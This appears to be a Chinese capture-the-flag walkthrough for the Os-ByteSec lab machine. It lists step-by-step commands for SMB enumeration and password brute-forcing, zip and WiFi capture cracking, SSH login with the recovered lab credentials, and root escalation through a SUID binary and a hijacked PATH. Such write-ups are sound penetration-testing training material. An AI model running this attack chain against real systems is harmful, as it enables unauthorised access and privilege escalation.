Os-ByteSec

一、主机发现和端口扫描

• 主机发现，靶机地址192.168.80.144

  

• 端口扫描，开放了80、139、445、2525端口

  

二、信息收集

• 访问80端口

  

• 路径扫描

  dirsearch -u "http://192.168.80.144/" -e *
  

  

• 访问扫描出来的路径，没有发现有价值的信息

  http://192.168.80.144/css/         
  http://192.168.80.144/gallery/    
  http://192.168.80.144/html/                                    
  http://192.168.80.144/img/        
  http://192.168.80.144/index.html                                     
  http://192.168.80.144/js/          
  http://192.168.80.144/news/
  

• 在网站下边发现了一个提示，是不是暗示着对SMB进行渗透

  

三、SMB渗透

• SMB是一个网络协议名，它能被用于Web连接和客户端与服务器之间的信息沟通，它允许应用程序和终端用户从远端的文件服务器访问文件资源

• 查询靶机中的用户信息

  enum4linux -U 192.168.80.144enum4linux是用于枚举windows和Linux系统上的SMB服务的工具。可以轻松的从与SMB服务有关的目标中快速提取信息
  

  

• 爆破用户smb密码，密码为空

  acccheck -t 192.168.80.144 -u smb -v
  

  

• 枚举靶机的共享资源

  smbmap -u 'smb' -p '' -H 192.168.80.144
  

  

• 查看靶机的共享目录

  smbclient -L 192.168.80.144 -U smb
  

  

• 通过SMB登录靶机

  smbclient //192.168.80.144/print$ -U smb
  

  

• 发现里面的文件全是0字节，但是发现了一个.目录，是不是指定smb用户的家目录呢，试一下

  smbclient //192.168.80.144/smb -U smb 
  

  

• 发现两个文件，其中main文件只有一个hello

  

• 将另一个文件下载下来

  

四、密码破解

• 尝试解压safe.zip，发现需要密码，爆破密码

  fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u safe.zip或者zip2john safe.zip > pass
  john pass密码hacker1
  

  

  

  

• 解压得到两个文件，secret.jpg和user.cap，图片没啥利用价值，使用wireshark打开user.cap文件进行分析，是个无线数据包，wifi名为blackjax，使用aircrack-ng破解user.cap文件，得到密码为snowflake

  aircrack-ng -w /usr/share/wordlists/rockyou.txt user.cap
  

  

五、权限提升

• 使用刚才得到的用户名密码登录ssh，得到第一个flag

  blackjax:snowflake
  ssh blackjax@192.168.80.144 -p 2525
  

  

• 该用户不能执行sudo

  

• 查看系统中带SUID的程序

  find / -user root -perm -4000 -print 2>/dev/null
  

  

• 其中netscan比较可疑，执行该命令

  

• 下载并分析该文件，发现它调用了execve函数执行了netstat -antp命令

  scp -P 2525 blackjax@192.168.80.144:/usr/bin/netscan /tmpstrace -f /tmp/netscan
  

  

  

• 通过劫持环境变量来让netscan在执行时执行其他命令

  # tmp有写权限
  echo "/bin/sh" > /tmp/netstat
  chmod 777 /tmp/netstat
  export PATH=/tmp:$PATH 
  netscan
  

• 提权成功